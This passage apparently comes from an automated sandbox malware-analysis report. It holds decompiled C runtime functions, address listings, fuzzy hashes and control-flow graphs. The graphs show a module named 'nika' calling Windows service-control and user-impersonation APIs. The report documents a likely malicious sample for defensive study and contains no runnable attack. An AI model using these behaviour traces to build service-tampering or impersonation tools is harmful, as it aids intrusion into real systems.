                                                                        					_t61 = E0040BFC1(_t105);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					 *_t61 = 0x16;
                                                                        					E0040E744(_t90, 0, _t100);
                                                                        					goto L4;
                                                                        				}
                                                                        			}





























                                                                        0x0040baaa
                                                                        0x0040baba
                                                                        0x0040bae0
                                                                        0x00000000
                                                                        0x0040bac1
                                                                        0x0040bac1
                                                                        0x0040bac4
                                                                        0x0040bac6
                                                                        0x0040bae7
                                                                        0x0040baea
                                                                        0x0040baec
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040baee
                                                                        0x0040baf3
                                                                        0x0040baf6
                                                                        0x0040baf9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bafe
                                                                        0x0040bb02
                                                                        0x0040bb09
                                                                        0x0040bb0c
                                                                        0x0040bb0f
                                                                        0x0040bb11
                                                                        0x0040bb1b
                                                                        0x0040bb13
                                                                        0x0040bb16
                                                                        0x0040bb16
                                                                        0x0040bb22
                                                                        0x0040bb24
                                                                        0x0040bbe9
                                                                        0x00000000
                                                                        0x0040bb2a
                                                                        0x0040bb2a
                                                                        0x0040bb2d
                                                                        0x0040bb2d
                                                                        0x0040bb33
                                                                        0x0040bb64
                                                                        0x0040bb64
                                                                        0x0040bb67
                                                                        0x0040bbc0
                                                                        0x0040bbc7
                                                                        0x0040bbca
                                                                        0x0040bbf5
                                                                        0x0040bbf5
                                                                        0x0040bbf7
                                                                        0x00000000
                                                                        0x0040bbfb
                                                                        0x0040bbcc
                                                                        0x0040bbcf
                                                                        0x0040bbd2
                                                                        0x0040bbd3
                                                                        0x0040bbd6
                                                                        0x0040bbd8
                                                                        0x0040bbda
                                                                        0x0040bbda
                                                                        0x00000000
                                                                        0x0040bbd8
                                                                        0x0040bb69
                                                                        0x0040bb6b
                                                                        0x0040bb78
                                                                        0x0040bb78
                                                                        0x0040bb7c
                                                                        0x0040bb7e
                                                                        0x0040bb82
                                                                        0x0040bb84
                                                                        0x0040bb87
                                                                        0x0040bb87
                                                                        0x0040bb87
                                                                        0x0040bb89
                                                                        0x0040bb8a
                                                                        0x0040bb94
                                                                        0x0040bb95
                                                                        0x0040bb9a
                                                                        0x0040bb9d
                                                                        0x0040bba0
                                                                        0x0040bc03
                                                                        0x0040bc03
                                                                        0x0040bc07
                                                                        0x00000000
                                                                        0x0040bba2
                                                                        0x0040bba2
                                                                        0x0040bba4
                                                                        0x0040bba6
                                                                        0x0040bba8
                                                                        0x0040bba8
                                                                        0x0040bbaa
                                                                        0x0040bbad
                                                                        0x0040bbaf
                                                                        0x0040bbb1
                                                                        0x00000000
                                                                        0x0040bbb3
                                                                        0x0040bbb3
                                                                        0x0040bbb3
                                                                        0x00000000
                                                                        0x0040bbb3
                                                                        0x0040bbb1
                                                                        0x0040bba0
                                                                        0x0040bb6e
                                                                        0x0040bb74
                                                                        0x0040bb76
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bb76
                                                                        0x0040bb35
                                                                        0x0040bb38
                                                                        0x0040bb3a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bb3c
                                                                        0x0040bbf1
                                                                        0x0040bbf1
                                                                        0x0040bbf1
                                                                        0x00000000
                                                                        0x0040bbf1
                                                                        0x0040bb42
                                                                        0x0040bb44
                                                                        0x0040bb46
                                                                        0x0040bb48
                                                                        0x0040bb48
                                                                        0x0040bb50
                                                                        0x0040bb55
                                                                        0x0040bb58
                                                                        0x0040bb5a
                                                                        0x0040bb5d
                                                                        0x0040bb5f
                                                                        0x00000000
                                                                        0x0040bbe1
                                                                        0x0040bbe1
                                                                        0x0040bbe1
                                                                        0x00000000
                                                                        0x0040bb2a
                                                                        0x0040bb24
                                                                        0x0040bac8
                                                                        0x0040bac8
                                                                        0x0040bacd
                                                                        0x0040bace
                                                                        0x0040bacf
                                                                        0x0040bad0
                                                                        0x0040bad1
                                                                        0x0040bad2
                                                                        0x0040bad8
                                                                        0x00000000
                                                                        0x0040badd

                                                                        APIs
                                                                        • __flush.LIBCMT ref: 0040BB6E
                                                                        • __fileno.LIBCMT ref: 0040BB8E
                                                                        • __locking.LIBCMT ref: 0040BB95
                                                                        • __flsbuf.LIBCMT ref: 0040BBC0
                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                        • String ID:
                                                                        • API String ID: 3240763771-0
                                                                        • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                        • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                        • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                        • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				char _v8;
                                                                        				signed int _v12;
                                                                        				char _v20;
                                                                        				char _t43;
                                                                        				char _t46;
                                                                        				signed int _t53;
                                                                        				signed int _t54;
                                                                        				intOrPtr _t56;
                                                                        				int _t57;
                                                                        				int _t58;
                                                                        				signed short* _t59;
                                                                        				short* _t60;
                                                                        				int _t65;
                                                                        				char* _t72;
                                                                        
                                                                        				_t72 = _a8;
                                                                        				if(_t72 == 0 || _a12 == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					if( *_t72 != 0) {
                                                                        						E0040EC86( &_v20, _a16);
                                                                        						_t43 = _v20;
                                                                        						__eflags =  *(_t43 + 0x14);
                                                                        						if( *(_t43 + 0x14) != 0) {
                                                                        							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                                        							__eflags = _t46;
                                                                        							if(_t46 == 0) {
                                                                        								__eflags = _a4;
                                                                        								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                        								if(__eflags != 0) {
                                                                        									L10:
                                                                        									__eflags = _v8;
                                                                        									if(_v8 != 0) {
                                                                        										_t53 = _v12;
                                                                        										_t11 = _t53 + 0x70;
                                                                        										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                        										__eflags =  *_t11;
                                                                        									}
                                                                        									return 1;
                                                                        								}
                                                                        								L21:
                                                                        								_t54 = E0040BFC1(__eflags);
                                                                        								 *_t54 = 0x2a;
                                                                        								__eflags = _v8;
                                                                        								if(_v8 != 0) {
                                                                        									_t54 = _v12;
                                                                        									_t33 = _t54 + 0x70;
                                                                        									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                        									__eflags =  *_t33;
                                                                        								}
                                                                        								return _t54 | 0xffffffff;
                                                                        							}
                                                                        							_t56 = _v20;
                                                                        							_t65 =  *(_t56 + 0xac);
                                                                        							__eflags = _t65 - 1;
                                                                        							if(_t65 <= 1) {
                                                                        								L17:
                                                                        								__eflags = _a12 -  *(_t56 + 0xac);
                                                                        								if(__eflags < 0) {
                                                                        									goto L21;
                                                                        								}
                                                                        								__eflags = _t72[1];
                                                                        								if(__eflags == 0) {
                                                                        									goto L21;
                                                                        								}
                                                                        								L19:
                                                                        								_t57 =  *(_t56 + 0xac);
                                                                        								__eflags = _v8;
                                                                        								if(_v8 == 0) {
                                                                        									return _t57;
                                                                        								}
                                                                        								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                        								return _t57;
                                                                        							}
                                                                        							__eflags = _a12 - _t65;
                                                                        							if(_a12 < _t65) {
                                                                        								goto L17;
                                                                        							}
                                                                        							__eflags = _a4;
                                                                        							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                        							__eflags = _t58;
                                                                        							_t56 = _v20;
                                                                        							if(_t58 != 0) {
                                                                        								goto L19;
                                                                        							}
                                                                        							goto L17;
                                                                        						}
                                                                        						_t59 = _a4;
                                                                        						__eflags = _t59;
                                                                        						if(_t59 != 0) {
                                                                        							 *_t59 =  *_t72 & 0x000000ff;
                                                                        						}
                                                                        						goto L10;
                                                                        					} else {
                                                                        						_t60 = _a4;
                                                                        						if(_t60 != 0) {
                                                                        							 *_t60 = 0;
                                                                        						}
                                                                        						goto L5;
                                                                        					}
                                                                        				}
                                                                        			}

















                                                                        0x004152a9
                                                                        0x004152b0
                                                                        0x004152c7
                                                                        0x00000000
                                                                        0x004152b7
                                                                        0x004152b9
                                                                        0x004152d3
                                                                        0x004152d8
                                                                        0x004152db
                                                                        0x004152de
                                                                        0x00415307
                                                                        0x0041530e
                                                                        0x00415310
                                                                        0x00415391
                                                                        0x004153ac
                                                                        0x004153ae
                                                                        0x004152ee
                                                                        0x004152ee
                                                                        0x004152f1
                                                                        0x004152f3
                                                                        0x004152f6
                                                                        0x004152f6
                                                                        0x004152f6
                                                                        0x004152f6
                                                                        0x00000000
                                                                        0x004152fc
                                                                        0x00415370
                                                                        0x00415370
                                                                        0x00415375
                                                                        0x0041537b
                                                                        0x0041537e
                                                                        0x00415380
                                                                        0x00415383
                                                                        0x00415383
                                                                        0x00415383
                                                                        0x00415383
                                                                        0x00000000
                                                                        0x00415387
                                                                        0x00415312
                                                                        0x00415315
                                                                        0x0041531b
                                                                        0x0041531e
                                                                        0x00415345
                                                                        0x00415348
                                                                        0x0041534e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00415350
                                                                        0x00415353
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00415355
                                                                        0x00415355
                                                                        0x0041535b
                                                                        0x0041535e
                                                                        0x004152cc
                                                                        0x004152cc
                                                                        0x00415367
                                                                        0x00000000
                                                                        0x00415367
                                                                        0x00415320
                                                                        0x00415323
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00415327
                                                                        0x00415338
                                                                        0x0041533e
                                                                        0x00415340
                                                                        0x00415343
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00415343
                                                                        0x004152e0
                                                                        0x004152e3
                                                                        0x004152e5
                                                                        0x004152eb
                                                                        0x004152eb
                                                                        0x00000000
                                                                        0x004152bb
                                                                        0x004152bb
                                                                        0x004152c0
                                                                        0x004152c4
                                                                        0x004152c4
                                                                        0x00000000
                                                                        0x004152c0
                                                                        0x004152b9

                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                        • __isleadbyte_l.LIBCMT ref: 00415307
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                        • String ID:
                                                                        • API String ID: 3058430110-0
                                                                        • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                        • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                        • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                        • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                        				intOrPtr _t25;
                                                                        				void* _t26;
                                                                        				void* _t28;
                                                                        
                                                                        				_t25 = _a16;
                                                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                        					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                        					goto L9;
                                                                        				} else {
                                                                        					_t34 = _t25 - 0x66;
                                                                        					if(_t25 != 0x66) {
                                                                        						__eflags = _t25 - 0x61;
                                                                        						if(_t25 == 0x61) {
                                                                        							L7:
                                                                        							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                        						} else {
                                                                        							__eflags = _t25 - 0x41;
                                                                        							if(__eflags == 0) {
                                                                        								goto L7;
                                                                        							} else {
                                                                        								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                        							}
                                                                        						}
                                                                        						L9:
                                                                        						return _t26;
                                                                        					} else {
                                                                        						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                        					}
                                                                        				}
                                                                        			}






                                                                        0x004134e0
                                                                        0x004134e6
                                                                        0x00413559
                                                                        0x00000000
                                                                        0x004134ed
                                                                        0x004134ed
                                                                        0x004134f0
                                                                        0x0041350b
                                                                        0x0041350e
                                                                        0x0041352e
                                                                        0x00413540
                                                                        0x00413510
                                                                        0x00413510
                                                                        0x00413513
                                                                        0x00000000
                                                                        0x00413515
                                                                        0x00413527
                                                                        0x00413527
                                                                        0x00413513
                                                                        0x0041355e
                                                                        0x00413562
                                                                        0x004134f2
                                                                        0x0041350a
                                                                        0x0041350a
                                                                        0x004134f0

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                        • String ID:
                                                                        • API String ID: 3016257755-0
                                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                        • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                        • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:56.8%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:28.6%
                                                                        Total number of Nodes:21
                                                                        Total number of Limit Nodes:0

                                                                        Callgraph

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 9 7ffdc87b1b10-7ffdc87b1b17 10 7ffdc87b1b19-7ffdc87b1b21 9->10 11 7ffdc87b1b22-7ffdc87b1bd8 9->11 10->11 15 7ffdc87b1c36-7ffdc87b1c68 11->15 16 7ffdc87b1bda-7ffdc87b1be9 11->16 21 7ffdc87b1cc7-7ffdc87b1d00 15->21 22 7ffdc87b1c6a-7ffdc87b1c7a 15->22 16->15 17 7ffdc87b1beb-7ffdc87b1bee 16->17 19 7ffdc87b1c28-7ffdc87b1c30 17->19 20 7ffdc87b1bf0-7ffdc87b1c03 17->20 19->15 23 7ffdc87b1c07-7ffdc87b1c1a 20->23 24 7ffdc87b1c05 20->24 32 7ffdc87b1d5e-7ffdc87b1d97 21->32 33 7ffdc87b1d02-7ffdc87b1d11 21->33 22->21 25 7ffdc87b1c7c-7ffdc87b1c7f 22->25 23->23 26 7ffdc87b1c1c-7ffdc87b1c24 23->26 24->23 27 7ffdc87b1cb9-7ffdc87b1cc1 25->27 28 7ffdc87b1c81-7ffdc87b1c94 25->28 26->19 27->21 30 7ffdc87b1c98-7ffdc87b1cab 28->30 31 7ffdc87b1c96 28->31 30->30 34 7ffdc87b1cad-7ffdc87b1cb5 30->34 31->30 39 7ffdc87b1df6-7ffdc87b1e2f 32->39 40 7ffdc87b1d99-7ffdc87b1da9 32->40 33->32 35 7ffdc87b1d13-7ffdc87b1d16 33->35 34->27 37 7ffdc87b1d18-7ffdc87b1d2b 35->37 38 7ffdc87b1d50-7ffdc87b1d58 35->38 41 7ffdc87b1d2f-7ffdc87b1d42 37->41 42 7ffdc87b1d2d 37->42 38->32 50 7ffdc87b1e8e-7ffdc87b1ec7 39->50 51 7ffdc87b1e31-7ffdc87b1e41 39->51 40->39 44 7ffdc87b1dab-7ffdc87b1dae 40->44 41->41 43 7ffdc87b1d44-7ffdc87b1d4c 41->43 42->41 43->38 45 7ffdc87b1de8-7ffdc87b1df0 44->45 46 7ffdc87b1db0-7ffdc87b1dc3 44->46 45->39 48 7ffdc87b1dc7-7ffdc87b1dda 46->48 49 7ffdc87b1dc5 46->49 48->48 53 7ffdc87b1ddc-7ffdc87b1de4 48->53 49->48 59 7ffdc87b1f26-7ffdc87b1fe2 ChangeServiceConfigA 50->59 60 7ffdc87b1ec9-7ffdc87b1ed9 50->60 51->50 52 7ffdc87b1e43-7ffdc87b1e46 51->52 54 7ffdc87b1e48-7ffdc87b1e5b 52->54 55 7ffdc87b1e80-7ffdc87b1e88 52->55 53->45 57 7ffdc87b1e5f-7ffdc87b1e72 54->57 58 7ffdc87b1e5d 54->58 55->50 57->57 61 7ffdc87b1e74-7ffdc87b1e7c 57->61 58->57 66 7ffdc87b1fea-7ffdc87b1ffc call 7ffdc87b2049 59->66 67 7ffdc87b1fe4 59->67 60->59 62 7ffdc87b1edb-7ffdc87b1ede 60->62 61->55 64 7ffdc87b1f18-7ffdc87b1f20 62->64 65 7ffdc87b1ee0-7ffdc87b1ef3 62->65 64->59 68 7ffdc87b1ef7-7ffdc87b1f0a 65->68 69 7ffdc87b1ef5 65->69 72 7ffdc87b2001-7ffdc87b202d 66->72 67->66 68->68 71 7ffdc87b1f0c-7ffdc87b1f14 68->71 69->68 71->64 73 7ffdc87b202f 72->73 74 7ffdc87b2034-7ffdc87b2048 72->74 73->74
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.319415276.00007FFDC87B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7ffdc87b0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeConfigService
                                                                        • String ID:
                                                                        • API String ID: 3849694230-0
                                                                        • Opcode ID: 53c445b60fadff15bda865a4fda2bc2353c71aea65b53c23c3e0c2ef35bcced4
                                                                        • Instruction ID: e28786ec6b61fd0d39f57067b9e9a6955bd2b9ad521d0666d37331141ed8d149
                                                                        • Opcode Fuzzy Hash: 53c445b60fadff15bda865a4fda2bc2353c71aea65b53c23c3e0c2ef35bcced4
                                                                        • Instruction Fuzzy Hash: A5F1C330A18A4D4FEB68DF28CC567F977D1FB58311F10426EE84EC7291EA7499818BC6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.319415276.00007FFDC87B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7ffdc87b0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: a3d7a0c6a90383fe2894f53bf9b067ecae1d7d365efd291a0e59eea78166683d
                                                                        • Instruction ID: 3fb3e0ea89a1f0be41906c01f634b0b5c0c1bdbed55ae2053e46a9022775e011
                                                                        • Opcode Fuzzy Hash: a3d7a0c6a90383fe2894f53bf9b067ecae1d7d365efd291a0e59eea78166683d
                                                                        • Instruction Fuzzy Hash: C4915F30A08A4D8FEB68DF18C899BF977D1FF55310F00416EE84EC7292DA75A985CB85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 108 7ffdc87b0c34-7ffdc87b0c3b 109 7ffdc87b0c46-7ffdc87b0ce5 108->109 110 7ffdc87b0c3d-7ffdc87b0c45 108->110 114 7ffdc87b0ce7-7ffdc87b0cf6 109->114 115 7ffdc87b0d40-7ffdc87b0daa OpenServiceA 109->115 110->109 114->115 116 7ffdc87b0cf8-7ffdc87b0cfb 114->116 120 7ffdc87b0dac 115->120 121 7ffdc87b0db2-7ffdc87b0de6 call 7ffdc87b0e02 115->121 118 7ffdc87b0d35-7ffdc87b0d3d 116->118 119 7ffdc87b0cfd-7ffdc87b0d10 116->119 118->115 122 7ffdc87b0d14-7ffdc87b0d27 119->122 123 7ffdc87b0d12 119->123 120->121 127 7ffdc87b0de8 121->127 128 7ffdc87b0ded-7ffdc87b0e01 121->128 122->122 125 7ffdc87b0d29-7ffdc87b0d31 122->125 123->122 125->118 127->128
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.319415276.00007FFDC87B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7ffdc87b0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: OpenService
                                                                        • String ID:
                                                                        • API String ID: 3098006287-0
                                                                        • Opcode ID: 0f2f3216d3632c1537140222ade97ed4171d7be3c3edf1571af46cf33aecbf0b
                                                                        • Instruction ID: 0d10060bd32d1a0f1a2ecfc27da841474fff4beaf3ec2bac5054b7a823732be3
                                                                        • Opcode Fuzzy Hash: 0f2f3216d3632c1537140222ade97ed4171d7be3c3edf1571af46cf33aecbf0b
                                                                        • Instruction Fuzzy Hash: E951C670908A8D4FEB58EF28CC5A7F97BD1FB59311F10416EE84EC3292DE74A8418B85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 129 7ffdc87b0b2d-7ffdc87b0bb8 134 7ffdc87b0bba-7ffdc87b0bbf 129->134 135 7ffdc87b0bc2-7ffdc87b0bc7 129->135 134->135 136 7ffdc87b0bc9-7ffdc87b0bce 135->136 137 7ffdc87b0bd1-7ffdc87b0c08 OpenSCManagerW 135->137 136->137 138 7ffdc87b0c0a 137->138 139 7ffdc87b0c10-7ffdc87b0c2d 137->139 138->139
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.319415276.00007FFDC87B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7ffdc87b0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ManagerOpen
                                                                        • String ID:
                                                                        • API String ID: 1889721586-0
                                                                        • Opcode ID: c8071db29e843ab0697143bc5bc42d8162a12f9f2105ac6ba1cc0f1dedb20fad
                                                                        • Instruction ID: 109e2e10a9423426847a1f2bdc70ad2a84929c40a612fb095283d13b330df422
                                                                        • Opcode Fuzzy Hash: c8071db29e843ab0697143bc5bc42d8162a12f9f2105ac6ba1cc0f1dedb20fad
                                                                        • Instruction Fuzzy Hash: AE31A43190CA584FDB28DF989859AFABBF0EB65311F00426FD04ED3592DF706845CB85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 140 7ffdc87b1a1d-7ffdc87b1a25 141 7ffdc87b1a27 140->141 142 7ffdc87b1a28-7ffdc87b1ad9 ControlService 140->142 141->142 146 7ffdc87b1adb 142->146 147 7ffdc87b1ae1-7ffdc87b1b09 142->147 146->147
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.319415276.00007FFDC87B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7ffdc87b0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ControlService
                                                                        • String ID:
                                                                        • API String ID: 253159669-0
                                                                        • Opcode ID: 1ee4445f8612f8c9c1c53dd09d61a2068b8f60df340346275d44251f90dc3e27
                                                                        • Instruction ID: fc038a620d6dee27823275ce6520b1b7d7f5c9ff2ad2259416c0609173930753
                                                                        • Opcode Fuzzy Hash: 1ee4445f8612f8c9c1c53dd09d61a2068b8f60df340346275d44251f90dc3e27
                                                                        • Instruction Fuzzy Hash: 5C31F53190CB588FDB18DF9D9845AF97BE0EF65321F04017FE08AD3292DB64A805CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 148 7ffdc87b108a-7ffdc87b10b3 149 7ffdc87b10b5-7ffdc87b10bd 148->149 150 7ffdc87b10be-7ffdc87b1152 FindCloseChangeNotification 148->150 149->150 153 7ffdc87b115a-7ffdc87b1181 150->153 154 7ffdc87b1154 150->154 154->153
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.319415276.00007FFDC87B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7ffdc87b0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 1c84739e97658b883ada4f636337fb37b7476901443d1203279c480ed5649086
                                                                        • Instruction ID: 65fbbe634686054972bc58a18c5a18301fcdd369ec920a58b8631202599edc0d
                                                                        • Opcode Fuzzy Hash: 1c84739e97658b883ada4f636337fb37b7476901443d1203279c480ed5649086
                                                                        • Instruction Fuzzy Hash: 7B31D43090C7889FDB0ADB688815BE97FF0EF57320F04429FD089C31A2DA696856CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 155 7ffdc87b1760-7ffdc87b1767 156 7ffdc87b1769-7ffdc87b1771 155->156 157 7ffdc87b1772-7ffdc87b1802 ImpersonateLoggedOnUser 155->157 156->157 161 7ffdc87b180a-7ffdc87b1831 157->161 162 7ffdc87b1804 157->162 162->161
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.319415276.00007FFDC87B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7ffdc87b0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ImpersonateLoggedUser
                                                                        • String ID:
                                                                        • API String ID: 2216092060-0
                                                                        • Opcode ID: 9d6d1cf6b69d0bbec7c3427f5ed731ab9147a4de3b89789de79ecd203ffc5263
                                                                        • Instruction ID: 414020586956865084124877d5e46864503d9a5d2df3e0a53f9e948d70214de1
                                                                        • Opcode Fuzzy Hash: 9d6d1cf6b69d0bbec7c3427f5ed731ab9147a4de3b89789de79ecd203ffc5263
                                                                        • Instruction Fuzzy Hash: 7431D43190CA4C8FDB58DF688845BF9BBE1FF66321F04422ED049C3192DB74A856CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(0121E000,?,0121A9A0,0121AF26,?,0121E000,0121AF26,0121E000), ref: 0121A9C3
                                                                        • TerminateProcess.KERNEL32(00000000,?,0121A9A0,0121AF26,?,0121E000,0121AF26,0121E000), ref: 0121A9CA
                                                                        • ExitProcess.KERNEL32 ref: 0121A9DC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
